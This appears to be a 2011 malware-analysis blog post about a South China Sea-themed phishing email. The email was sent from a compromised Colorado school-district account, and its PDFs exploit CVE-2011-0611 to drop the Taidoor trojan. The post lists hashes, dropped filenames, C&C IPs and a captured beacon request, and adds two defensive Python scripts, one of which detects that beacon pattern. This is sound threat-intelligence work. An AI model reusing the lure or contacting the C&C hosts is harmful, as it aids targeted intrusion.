-- This message came from a compromised account on mail.ppboces.org, the mail server for Pikes Peak Board of Cooperative Educational Services in Colorado Springs, CO. It has two attachments exploiting CVE-2011-0611.
--The payload is Trojan Taidoor / Rubinurd, a trojan frequently used in targeted attacks (see more on Taidoor here). For attribution reasons, I would like to know if this is a private custom trojan or something commercial and thus used by more than one group of attackers. If you happen to know, let me know. The PDF and the payload have Chinese language in the file metadata and code.
-- The C&C IP addresses are 62.38.148.117 (ports 443, 80) - Hellas On Line S.A., Greece, Attiki, and 64.167.26.66 (port 80) - SBC Internet Services, Costa Mesa, CA
Common Vulnerabilities and Exposures (CVE) number
CVE-2011-0611
Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.
General File information
File Name: 90-2011 Robert Beckman.pdf
MD5 : 6fdc8f02e7f649a6c0d2a72e421a5bf9
File size : 249913 bytes
Distribution: Email attachment
File Name: 91-2011 Sam Bateman.pdf
MD5 : 6fdc8f02e7f649a6c0d2a72e421a5bf9
File size : 249913 bytes
Original Message
From: Hxxxxxxxx, Mxxxxxxxx (xxxxxxxxx) [mailto:mhxxxxxxxxxxxx@ppboces.org]
Sent: Monday, June 27, 2011 8:46 AM
To: dothanhhai80@gmail.com
Subject: Two Views On The South China Sea
Dear all,
1. We are pleased to attach for your reading pleasure two views on the South China Sea.
2. Synopsis I: Robert Beckman on the South China Sea: Worsening Dispute or Growing Clarity in Claims?
In May 2009 Malaysia and Vietnam made submissions to extend their continental shelves beyond 200 nautical miles into the South China Sea, and China objected to their submissions. While adding a layer of complexity to the South China Sea disputes, the submissions and objections also clarified the claims of the competing states.
3. Synopsis 2: Sam Bateman on the South China Sea: When the Elephants Dance.
The situation in the South China Sea has deteriorated recently. The three key players -- China, the United States and Vietnam -- can all accept some
responsibility for the deterioration and should now mediate their differences.
xxxxxxxxxxxxx
Executive Assistant to Archie Neil
Pikes Peak BOCES
4825 Lorna Place
Colorado Springs, CO 80915
719-622-2089
719-380-9685 fax
Message Headers
Received: (qmail 12816 invoked from network); 27 Jun 2011 12:46:08 -0000
Received: from 63-253-126-17.ip.mcleodusa.net (HELO MAIL.PPBOCES.ORG) (63.253.126.17)
by xxxxxxxxx with SMTP; 27 Jun 2011 12:46:08 -0000
Return-Path: mhxxxxxxs@ppboces.org
X-Envelope-From: mhxxxxxxxxx@ppboxxxxxxxxx
Received: From bocesex01.ppboces.local (172.18.0.20) by MAIL.PPBOCES.ORG (MAILFOUNDRY) id +zJm6qC8EeCuLQAw; Mon, 27 Jun 2011 12:57:15 -0000 (GMT)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----_=_NextPart_001_01CC34C8.AD469615"
Subject: Two Views On The South China Sea
Date: Mon, 27 Jun 2011 06:45:59 -0600
Message-ID: <92E09D8019C5384A97503350032F27AC01C6F84B@bocesex01.ppboces.local>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
Thread-Topic: Two Views On The South China Sea
Thread-Index: AcwZipt/3F+WVOQ6Rh2SHXBf8g3DNgbPY69E
References: <92E09D8019C5384A97503350032F27AC0170C2C7@bocesex01.ppboces.local>
From: xxxxxxxxxx@ppboces.org
To:
IP: 63.253.126.17
Mail.ppboces.org points to 63.253.126.17. Miamiyoder.org, calhanschool.org and ppboces.org use this as a mail server.
Hostname: 63-253-126-17.ip.mcleodusa.net
ISP: PaeTec Communications
Organization: PIKES PEAK BOCES
Type: Corporate
Assignment: Static IP
Country: United States
State/Region: Colorado
City: Colorado Springs
This appears to be a compromised account on Mail.ppboces.org
Automated Scans
90-2011 Robert Beckman.pdf
http://www.virustotal.com/file-scan/report.html?id=1a685fae2093096e96b9a41a6aa57320008208b7d8a7e39dcf834146cbc5b5e6-1309229502
Submission date: 2011-06-28 02:51:42 (UTC)
Result: 8 /41 (19.5%)
Avast5 5.0.677.0 2011.06.27 SWF:Dropper
BitDefender 7.2 2011.06.28 Script.SWF.C06
Commtouch 5.3.2.6 2011.06.28 JS/Pdfka.V
eTrust-Vet 36.1.8411 2011.06.28 PDF/CVE-2010-1297.B!exploit
GData 22 2011.06.28 Script.SWF.C06
Microsoft 1.7000 2011.06.27 Exploit:SWF/Shellcode.B
nProtect 2011-06-27.01 2011.06.27 Script.SWF.C06
VirusBuster 14.0.98.0 2011.06.27 Exploit.SWF.Agent2.CGJE
MD5 : a755f5b7bd80091561298d971a8f111d
91-2011 Sam Bateman.pdf
http://www.virustotal.com/file-scan/report.html?id=9bf9677524b519fc1dbc5455f78afce3dfecc1477f52874f3a6272e6eae7bb4b-1309274223
MD5 : 6fdc8f02e7f649a6c0d2a72e421a5bf9
File size : 249913 bytes
PDF information
This appears to be CVE-2011-0611; please correct me if I am wrong and it is CVE-2011-0609.
I used:
Didier Stevens' PDF-Parser.py for dumping uncompressed raw data
pySwfCarve.py by Giuseppe Bonfa for carving out the SWF
Trillix Flash decompiler for decompiling the Flash (make sure your VM is patched)
PE Explorer for the binary
File metadata
The string in Chinese means: "Untitled"
The file checks for Reader versions and offers to upgrade if it is below version 9
Malicious pdf executed on a vulnerable version of Adobe Reader
The extracted and decompiled Flash file is below; you can see the full ActionScript here:
http://pastebin.com/GMQG9gi4
Payload
Trojan Taidoor - also featured in
- May-June 2011 Trojan Taidoor "Louisvilleheartsurgery.com" phishing campaign
- Feb 25 CVE-2010-3333 DOC China's Military Build-up from a compromised IBEW-NECA Joint Trust Funds account
This trojan is characterized by the traffic it generates, e.g.
http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D
The general form is http://aaaaa/bbbbb.php?id=xxxxxxyyyyyyyyyyyy where
aaaaa is a host or domain
bbbbb is a 5-character string
xxxxxx is a 6-character changing string
yyyyyyyyyyyy is a 12-character, more or less constant string
Dropped under Local Settings\ with one of the names listed below
File: COMSysApp.exe
Size: 22016
MD5: 17A6E614E2C95390C60C714F340214F7
List of possible names:
Alerter.exe
AppMgmt.exe
CiSvc.exe
ClipSrv.exe
COMSysApp.exe
dmadmin.exe
Dot3svc.exe
EapHost.exe
HidServ.exe
hkmsvc.exe
ImapiService.exe
Messenger.exe
mnmsrvc.exe
MSDTC.exe
MSIServer.exe
napagent.exe
NetDDE.exe
NetDDEdsdm.exe
Netlogon.exe
NtLmSsp.exe
NtmsSvc.exe
ose.exe
RasAuto.exe
RDSessMgr.exe
RemoteAccess.exe
rpcapd.exe
RpcLocator.exe
RSVP.exe
SwPrv.exe
SysmonLog.exe
TlntSvr.exe
upnphost.exe
UPS.exe
VSS.exe
WmdmPmSN.exe
Wmi.exe
WmiApSrv.exe
wuauserv.exe
xmlprov.exe
ClipSrv.exe - or any of the names above
http://www.virustotal.com/file-scan/report.html?id=e9c041225b56260851f75528bdf4b635c8974d6e5fe87b119e448a542354b2fc-1309274036
Submission date: 2011-06-28 15:13:56 (UTC)
Result: 14/ 42 (33.3%)
Antivirus Version Last Update Result
AhnLab-V3 2011.06.28.02 2011.06.28 Backdoor/Win32.CSon
AntiVir 7.11.10.137 2011.06.28 TR/Hijacker.Gen
AVG 10.0.0.1190 2011.06.28 Generic23.UVP
BitDefender 7.2 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
DrWeb 5.0.2.03300 2011.06.28 Trojan.Taidoor
F-Secure 9.0.16440.0 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
GData 22 2011.06.28 Gen:Trojan.Heur.TP.bq1@b0OVqSkb
Ikarus T3.1.1.104.0 2011.06.28 Trojan.SuspectCRC
Kaspersky 9.0.0.837 2011.06.28 HEUR:Trojan.Win32.Generic
McAfee 5.400.0.1158 2011.06.28 -
Microsoft 1.7000 2011.06.28 VirTool:Win32/Injector.gen!BJ
NOD32 6246 2011.06.28 a variant of Win32/Injector.HET
Norman 6.07.10 2011.06.28 W32/Obfuscated.JA
Rising 23.64.01.03 2011.06.28 Suspicious
VBA32 3.12.16.3 2011.06.28 TrojanDownloader.Rubinurd.f
Strings from the binary - also similar to other samples from the posts above
d{bw
ntdll.dll
NtUnmapViewOfSection
host.exe "
vices.exe "
%ProgramFiles%\Mcafee
GetModuleFileNameA
kernel32.dll
abcde
The language code of the file is displayed as English - United States (en-us, 1033), but the language ID is actually Chinese Simplified. (The language ID is a word (16-bit) integer value made up of a primary language and its sublanguage, as defined by Windows. If the resource item is "language neutral" then this value is zero.)
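As an added example, not code from the original post, the script below decodes a Windows LANGID into its primary language and sublanguage and compares the language that a StringFileInfo block name claims against the raw VarFileInfo\Translation entry, which is the kind of mismatch described above. The sample values are constructed to mirror the observation (en-us claimed, Chinese Simplified in the translation entry); the function names are my own.

```python
import struct

# Windows LANGID layout (winnt.h): bits 0-9 are the primary language,
# bits 10-15 the sublanguage. A value of 0 means "language neutral".
LANG_NEUTRAL = 0x00
LANG_CHINESE = 0x04
LANG_ENGLISH = 0x09
SUBLANG_ENGLISH_US = 0x01
SUBLANG_CHINESE_SIMPLIFIED = 0x02


def primary_langid(langid):
    return langid & 0x3FF


def sub_langid(langid):
    return (langid >> 10) & 0x3F


def make_langid(primary, sub):
    return (sub << 10) | primary


KNOWN = {
    make_langid(LANG_ENGLISH, SUBLANG_ENGLISH_US): "English - United States (en-us)",
    make_langid(LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED): "Chinese - Simplified (zh-cn)",
}


def describe_langid(langid):
    """Human-readable name for a LANGID; 0 is language neutral."""
    if langid == LANG_NEUTRAL:
        return "language neutral"
    if langid in KNOWN:
        return f"{KNOWN[langid]} ({langid})"
    return f"primary 0x{primary_langid(langid):02x}, sublanguage 0x{sub_langid(langid):02x} ({langid})"


def parse_translation(raw):
    """Decode the VarFileInfo\\Translation value: an array of (LANGID, code page) WORD pairs."""
    if len(raw) % 4:
        raise ValueError("Translation value must be a multiple of 4 bytes")
    return [struct.unpack_from("<HH", raw, off) for off in range(0, len(raw), 4)]


def check_version_info(string_block_key, translation_raw):
    """Compare the language a StringFileInfo block claims against the Translation array.

    string_block_key is the 8-hex-digit name of the StringFileInfo child block
    (LANGID then code page, e.g. "040904B0" for en-us / Unicode); its first four
    digits are what a resource viewer typically shows as the file's language.
    """
    claimed = int(string_block_key[:4], 16)
    actual = [langid for langid, _codepage in parse_translation(translation_raw)]
    return {
        "claimed": describe_langid(claimed),
        "actual": [describe_langid(langid) for langid in actual],
        "mismatch": claimed not in actual,
    }


# Constructed values modelled on the observation in the post: the string block
# says en-us (0x0409) while the raw translation entry is Chinese Simplified
# (0x0804) with code page 0x04B0 (Unicode).
SAMPLE_STRING_BLOCK = "040904B0"
SAMPLE_TRANSLATION = b"\x04\x08\xb0\x04"

if __name__ == "__main__":
    print(check_version_info(SAMPLE_STRING_BLOCK, SAMPLE_TRANSLATION))
```

A mismatch between the two is not proof of anything by itself, but it is cheap to check and, as here, it can point at the build environment of a sample whose displayed language looks unremarkable.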
Other files
File: 11.pdf
Size: 192815
MD5: 7BBE0534746D66FD012CF81219AE27A1
C:\WINDOWS\system32\d3d8caps.dat
File: d3d8caps.dat
Size: 768
MD5: 8C83D908E75F6B6971C7602CF2D26C1A
C:\WINDOWS\system32\d3d9caps.dat
File: d3d9caps.dat
Size: 664
MD5: B168F0FF0AF0292CB32DF1770A7DE164
<location of the pdf>\iso88591
File: iso88591
Size: 65536
MD5: 2EBA9C4FDEA2741821A836D2A325D5A5
Traffic
Hostname: adsl-64-167-26-66.dsl.lsan03.pacbell.net
ISP: SBC Internet Services
Organization: SBC Internet Services
Country: United States
State/Region: California
City: Costa Mesa
Hostname: static062038148117.dsl.hol.gr
ISP: Hellas On Line S.A.
Organization: Hellas On Line S.A.
Country: Greece
State/Region: Attiki
GET /glsma.php?id=0141281911380G7603 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 62.38.148.117:443
Connection: Keep-Alive
Cache-Control: no-cache
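As an added example, not from the original post, the beacon shape given in the Payload section and the captured GET request above can be turned into a proxy-log check. The log line format and the benign lines are constructed for this example; the two beacon URLs are the ones quoted in this post, and the helper names are my own.

```python
import re
from urllib.parse import urlsplit

# Beacon shape described in the post: http://aaaaa/bbbbb.php?id=xxxxxxyyyyyyyyyyyy
#   bbbbb        5-character script name
#   xxxxxx       6-character changing part of the id
#   yyyyyyyyyyyy 12-character, more or less constant part (handy for tracking one host)
PATH_RE = re.compile(r"^/(?P<script>[A-Za-z]{5})\.php$")
ID_RE = re.compile(r"^(?P<varying>[0-9A-Za-z]{6})(?P<constant>[0-9A-Za-z]{12})$")

# User-Agent from the captured request; a coarse secondary signal only.
TAIDOOR_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


def match_beacon(url):
    """Return the decomposed beacon if url has the Taidoor shape, else None."""
    parts = urlsplit(url)
    m = PATH_RE.match(parts.path)
    if not m:
        return None
    query = dict(p.split("=", 1) for p in parts.query.split("&") if "=" in p)
    if set(query) != {"id"}:  # exactly one parameter, and it is named id
        return None
    idm = ID_RE.match(query["id"])
    if not idm:
        return None
    return {
        "host": parts.netloc,  # host[:port], e.g. 62.38.148.117:443
        "script": m["script"],
        "varying": idm["varying"],
        "constant": idm["constant"],
    }


def scan_proxy_log(lines):
    """Scan constructed proxy-log lines of the form '<time> <client> <method> <url> <user-agent>'.

    Returns one hit per matching request; the 12-character constant part lets
    repeated beacons from the same infected host be correlated.
    """
    hits = []
    for line in lines:
        fields = line.split(None, 4)
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        ua = fields[4] if len(fields) == 5 else ""
        beacon = match_beacon(url)
        if beacon is None:
            continue
        beacon.update(time=ts, client=client, ua_match=(ua == TAIDOOR_UA))
        hits.append(beacon)
    return hits


# Constructed sample log; the two beacon URLs are the ones quoted in the post.
SAMPLE_LOG = [
    "2011-06-28T10:01:02 10.0.0.5 GET http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D "
    + TAIDOOR_UA,
    "2011-06-28T10:01:09 10.0.0.5 GET http://www.example.com/index.php?id=12345 "
    + TAIDOOR_UA,
    "2011-06-28T10:03:41 10.0.0.7 GET http://www.example.com/abcde.php?id=0123456789ABCDEFGH&x=1 "
    + "Mozilla/5.0",
    "2011-06-28T10:05:02 10.0.0.5 GET http://62.38.148.117:443/glsma.php?id=0141281911380G7603 "
    + TAIDOOR_UA,
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The path check alone is too loose (index.php matches the 5-letter pattern), so the 18-character id and the single-parameter query carry most of the weight; the User-Agent is recorded but not required, since it is a common browser string.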